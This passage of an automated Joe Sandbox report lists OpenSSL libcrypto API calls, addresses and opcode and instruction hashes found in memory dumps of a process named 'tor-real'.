                                                                            • Opcode Fuzzy Hash: 63b6637ea6085c64c23d7409244ec8063d3ea8712ecfc4a7eb3428b7e531a665
                                                                            • Instruction Fuzzy Hash: 0911D032A483108FC3109F95C44035AB7E2FFC8718F28CA2CE9985B764EB71E446CB85
                                                                            APIs
                                                                            • COMP_expand_block.LIBCRYPTO-1_1 ref: 6C09AD26
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09AD5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocP_expand_block
                                                                            • String ID:
                                                                            • API String ID: 3543690440-0
                                                                            • Opcode ID: c3698b3f9be96bc32cb3da96695cec9e70d2361cf3e0231553ef08c67d317b70
                                                                            • Instruction ID: dc8b88ec7a0d36c5fc66fab30003c0b7a348eca5716724438c39f699dd9b1fa9
                                                                            • Opcode Fuzzy Hash: c3698b3f9be96bc32cb3da96695cec9e70d2361cf3e0231553ef08c67d317b70
                                                                            • Instruction Fuzzy Hash: 980116B0A067018FDB44DF26D4C070BBBE0AF88705F10986DED888F355E334E9918B92
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C4ABD
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0C4AF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_memdup
                                                                            • String ID:
                                                                            • API String ID: 3962629258-0
                                                                            • Opcode ID: dc1be9e733be83aa291f6b78b25d4821466861a649658561386e94890363eef9
                                                                            • Instruction ID: 37d50525fccf44ff257ff356dcfc550537ddd2514288ba0a764c257965a2d85f
                                                                            • Opcode Fuzzy Hash: dc1be9e733be83aa291f6b78b25d4821466861a649658561386e94890363eef9
                                                                            • Instruction Fuzzy Hash: AC01F6B1205B029FE7209F64D9843ABFBE0FF84309F11882DD9A99B601D775B449CF82
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 5f74a654ddfbba0331a2dbb205be7804c18de49ce67784d00a53f2bb01474fe0
                                                                            • Instruction ID: 19d384b32ed53c1a6f5509ae1732ae6ddae50d0ad3c984505e59a42fd1548841
                                                                            • Opcode Fuzzy Hash: 5f74a654ddfbba0331a2dbb205be7804c18de49ce67784d00a53f2bb01474fe0
                                                                            • Instruction Fuzzy Hash: 2601F2B4604300CFE721DF64D0C9B5ABBE4AF48308F4985ECE9585F762D779E5448B82
                                                                            APIs
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0B2499
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B24BD
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2547
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_memdupR_put_error
                                                                            • String ID:
                                                                            • API String ID: 730276227-0
                                                                            • Opcode ID: 833d57b904d4899906ef4dbca559136edfbfeb808272e19c63c869c260398e94
                                                                            • Instruction ID: 14f6966df26b5ba1986151f2669cfdb2f2d8ba67dc40ff354c21c5dadbaff963
                                                                            • Opcode Fuzzy Hash: 833d57b904d4899906ef4dbca559136edfbfeb808272e19c63c869c260398e94
                                                                            • Instruction Fuzzy Hash: 01F085B1109B00CFD7008FA8E88135BBBE0AF88359F20886DE89C9F711D734D8808F81
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096986
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09699E
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: b2621adc17ae0dfa45be0d3625dfd2e7997fa9692f028348f1a5833d7ea14b6a
                                                                            • Instruction ID: 437236e313e553a2e39b6081ad0d7b348af71f09fb82e81831777bc79f0dc903
                                                                            • Opcode Fuzzy Hash: b2621adc17ae0dfa45be0d3625dfd2e7997fa9692f028348f1a5833d7ea14b6a
                                                                            • Instruction Fuzzy Hash: FBF0A5B51097008FD3009FA5E08135EBBE0EF88369F148A1DE9D89B7A0C335E4858B86
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0AE111
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0AE129
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlockD_write_lock
                                                                            • String ID:
                                                                            • API String ID: 1724170673-0
                                                                            • Opcode ID: e7b3899accfeffb28c8a06bf154d38761420515e3817295ba43145f8d801ee5b
                                                                            • Instruction ID: 275c56556acba02e9bc065f7c2183ea0e9d2f93b5c50e8375f4250cd241f484d
                                                                            • Opcode Fuzzy Hash: e7b3899accfeffb28c8a06bf154d38761420515e3817295ba43145f8d801ee5b
                                                                            • Instruction Fuzzy Hash: 4CE092B59447098BCB50AF68C4C4B9A77E0BF18304F4509ACED98AB705E634B9858FA1
                                                                            APIs
                                                                              • Part of subcall function 6C09A5A0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A5BD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096ADD
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: a454a6a258d9c4e0f30ccec724d6b4cb2db289a3cf3738227877a7834dd36b5c
                                                                            • Instruction ID: b05e4f4928fdb51a3521fb38a830ef2c29cd66cf7c36dd6174d631c77c2617a5
                                                                            • Opcode Fuzzy Hash: a454a6a258d9c4e0f30ccec724d6b4cb2db289a3cf3738227877a7834dd36b5c
                                                                            • Instruction Fuzzy Hash: 373171B4606B069FD354CF29D180A96FBE1BF88310F108A2DD8AE87B41D731B860CF94
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: a9092498052b6aacc36b99411b0bb5ab17a8a5bb701905b9cf4a151c7b865abf
                                                                            • Instruction ID: 825c93cefb7fcccf79887640a9ce23ce47899e203e18011832764cd3066b4b5e
                                                                            • Opcode Fuzzy Hash: a9092498052b6aacc36b99411b0bb5ab17a8a5bb701905b9cf4a151c7b865abf
                                                                            • Instruction Fuzzy Hash: 6021B372A012229FCB15DF59D490316FBE0FF80714F1E9699D86A9F705D231E884DBE0
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0956A7), ref: 6C09452A
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 4702b7f446c7d0caf9f00496938ed437591c197381c0a1e6f3d845effdaec197
                                                                            • Instruction ID: 2fbeb205223999d2078c26420e90307f446c9ec3b90af42ec16dc80d1a4fcde9
                                                                            • Opcode Fuzzy Hash: 4702b7f446c7d0caf9f00496938ed437591c197381c0a1e6f3d845effdaec197
                                                                            • Instruction Fuzzy Hash: B0219F726053059BD710DFE9E5C0716FBE4FF84728F1986ADC9698BB03E271E8809B90
                                                                            APIs
                                                                              • Part of subcall function 6C09A5A0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A5BD
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096D01
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: d2b499e0634311f6d20e6498f6723c8c2d5723a27ed531b437cf715c547207ef
                                                                            • Instruction ID: 29575fe76a822cd6bf58b4b25f1d7ef4d81dc1f56cec027faf75a9753dc1f713
                                                                            • Opcode Fuzzy Hash: d2b499e0634311f6d20e6498f6723c8c2d5723a27ed531b437cf715c547207ef
                                                                            • Instruction Fuzzy Hash: 853158B86017099FC744DF1AC180655BBE0BF88608F6485AECD684F716E732A952CF95
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0956A7), ref: 6C09452A
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 8455846ed547c423fe16c013f690b21abd8ef2b71352031e7aedbfd1bfdb151a
                                                                            • Instruction ID: b1583bc43660d8ca03faee1b6b0c65e4dceaa601ba1d1b161ab7cd265e177eb6
                                                                            • Opcode Fuzzy Hash: 8455846ed547c423fe16c013f690b21abd8ef2b71352031e7aedbfd1bfdb151a
                                                                            • Instruction Fuzzy Hash: 01F0C2762097099BCB109ED8E1C0346F7E0EF84718F194A6DCE698BB02F372E445A791
                                                                            APIs
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC753
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock
                                                                            • String ID:
                                                                            • API String ID: 3327040364-0
                                                                            • Opcode ID: 7192fdd6c8606f5d51919ad14b2f4d52c98569829392d4846455f21d5441fd2f
                                                                            • Instruction ID: ec38d0733aa51e60237d69839ca8f6ce22d64df61c3db88434a40173c884abb9
                                                                            • Opcode Fuzzy Hash: 7192fdd6c8606f5d51919ad14b2f4d52c98569829392d4846455f21d5441fd2f
                                                                            • Instruction Fuzzy Hash: A2011970A45B018BE740EF3889807DAB7E0BF45358F544629E4ADEBA80D736E4858B92
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0E4FC6
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0E514D
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocR_put_error
                                                                            • String ID:
                                                                            • API String ID: 2513334388-0
                                                                            • Opcode ID: 0fb722bff7751c77e07a10289988199f9987f4e6158d476fd6198e0cc744f114
                                                                            • Instruction ID: ba91141d673c85ba3d13130c6a179be476afc3f49d9a076ce1bb3b3c0cd5ab97
                                                                            • Opcode Fuzzy Hash: 0fb722bff7751c77e07a10289988199f9987f4e6158d476fd6198e0cc744f114
                                                                            • Instruction Fuzzy Hash: 9A0108755483118FC7109F25C19031BB7F1BB88344F81891DE9A99B610D730E8068F92
                                                                            APIs
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0DE04F
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_memdup
                                                                            • String ID:
                                                                            • API String ID: 560317026-0
                                                                            • Opcode ID: ae3ec4a0865f82f72832b928c5de5d522d5fc91e6b8bc74743c0ee699215c89e
                                                                            • Instruction ID: f02f59e468761727199c1d76a518e5c09c62e64596b908071272412fcfe74b5f
                                                                            • Opcode Fuzzy Hash: ae3ec4a0865f82f72832b928c5de5d522d5fc91e6b8bc74743c0ee699215c89e
                                                                            • Instruction Fuzzy Hash: 3901FB75A087508FD710CF19C48079AB7E0BF89714F098969EC98AB615C334A5408BD1
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0A0E9F
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9828
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9848
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9868
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9888
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E98A8
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E98C8
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E98E8
                                                                              • Part of subcall function 6C0E9790: BN_dup.LIBCRYPTO-1_1 ref: 6C0E9908
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_dup$O_zalloc
                                                                            • String ID:
                                                                            • API String ID: 3577659955-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC7BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlock
                                                                            • String ID:
                                                                            • API String ID: 3327040364-0
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACB37
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBC7
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_once
                                                                            • String ID:
                                                                            • API String ID: 1403826838-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            • CRYPTO_get_ex_new_index.LIBCRYPTO-1_1 ref: 6C0A4D62
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_get_ex_new_index
                                                                            • String ID:
                                                                            • API String ID: 3987194240-0
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_once
                                                                            • String ID:
                                                                            • API String ID: 1403826838-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_once
                                                                            • String ID:
                                                                            • API String ID: 1403826838-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0AC06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID:
                                                                            • API String ID: 1208671065-0
                                                                            APIs
                                                                            • EVP_des_cbc.LIBCRYPTO-1_1 ref: 6C0AC863
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC86B
                                                                            • EVP_des_ede3_cbc.LIBCRYPTO-1_1 ref: 6C0AC870
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC878
                                                                            • EVP_idea_cbc.LIBCRYPTO-1_1 ref: 6C0AC87D
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC885
                                                                            • EVP_rc4.LIBCRYPTO-1_1 ref: 6C0AC88A
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC892
                                                                            • EVP_rc4_hmac_md5.LIBCRYPTO-1_1 ref: 6C0AC897
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC89F
                                                                            • EVP_rc2_cbc.LIBCRYPTO-1_1 ref: 6C0AC8A4
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8AC
                                                                            • EVP_rc2_40_cbc.LIBCRYPTO-1_1 ref: 6C0AC8B1
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8B9
                                                                            • EVP_aes_128_cbc.LIBCRYPTO-1_1 ref: 6C0AC8BE
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8C6
                                                                            • EVP_aes_192_cbc.LIBCRYPTO-1_1 ref: 6C0AC8CB
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8D3
                                                                            • EVP_aes_256_cbc.LIBCRYPTO-1_1 ref: 6C0AC8D8
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8E0
                                                                            • EVP_aes_128_gcm.LIBCRYPTO-1_1 ref: 6C0AC8E5
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8ED
                                                                            • EVP_aes_256_gcm.LIBCRYPTO-1_1 ref: 6C0AC8F2
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8FA
                                                                            • EVP_aes_128_ccm.LIBCRYPTO-1_1 ref: 6C0AC8FF
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC907
                                                                            • EVP_aes_256_ccm.LIBCRYPTO-1_1 ref: 6C0AC90C
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC914
                                                                            • EVP_aes_128_cbc_hmac_sha1.LIBCRYPTO-1_1 ref: 6C0AC919
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC921
                                                                            • EVP_aes_256_cbc_hmac_sha1.LIBCRYPTO-1_1 ref: 6C0AC926
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC92E
                                                                            • EVP_aes_128_cbc_hmac_sha256.LIBCRYPTO-1_1 ref: 6C0AC933
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC93B
                                                                            • EVP_aes_256_cbc_hmac_sha256.LIBCRYPTO-1_1 ref: 6C0AC940
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC948
                                                                            • EVP_aria_128_gcm.LIBCRYPTO-1_1 ref: 6C0AC94D
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC955
                                                                            • EVP_aria_256_gcm.LIBCRYPTO-1_1 ref: 6C0AC95A
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC962
                                                                            • EVP_camellia_128_cbc.LIBCRYPTO-1_1 ref: 6C0AC967
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC96F
                                                                            • EVP_camellia_256_cbc.LIBCRYPTO-1_1 ref: 6C0AC974
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC97C
                                                                            • EVP_chacha20_poly1305.LIBCRYPTO-1_1 ref: 6C0AC981
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC989
                                                                            • EVP_seed_cbc.LIBCRYPTO-1_1 ref: 6C0AC98E
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC996
                                                                            • EVP_md5.LIBCRYPTO-1_1 ref: 6C0AC99B
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0AC9A3
                                                                            • OBJ_NAME_add.LIBCRYPTO-1_1 ref: 6C0AC9BF
                                                                            • EVP_md5_sha1.LIBCRYPTO-1_1 ref: 6C0AC9C4
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0AC9CC
                                                                            • EVP_sha1.LIBCRYPTO-1_1 ref: 6C0AC9D1
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0AC9D9
                                                                            • OBJ_NAME_add.LIBCRYPTO-1_1 ref: 6C0AC9F5
                                                                            • OBJ_NAME_add.LIBCRYPTO-1_1 ref: 6C0ACA11
                                                                            • EVP_sha224.LIBCRYPTO-1_1 ref: 6C0ACA16
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA1E
                                                                            • EVP_sha256.LIBCRYPTO-1_1 ref: 6C0ACA23
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA2B
                                                                            • EVP_sha384.LIBCRYPTO-1_1 ref: 6C0ACA30
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA38
                                                                            • EVP_sha512.LIBCRYPTO-1_1 ref: 6C0ACA3D
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA45
                                                                              • Part of subcall function 6C0AA230: CRYPTO_THREAD_run_once.LIBCRYPTO-1_1 ref: 6C0AA242
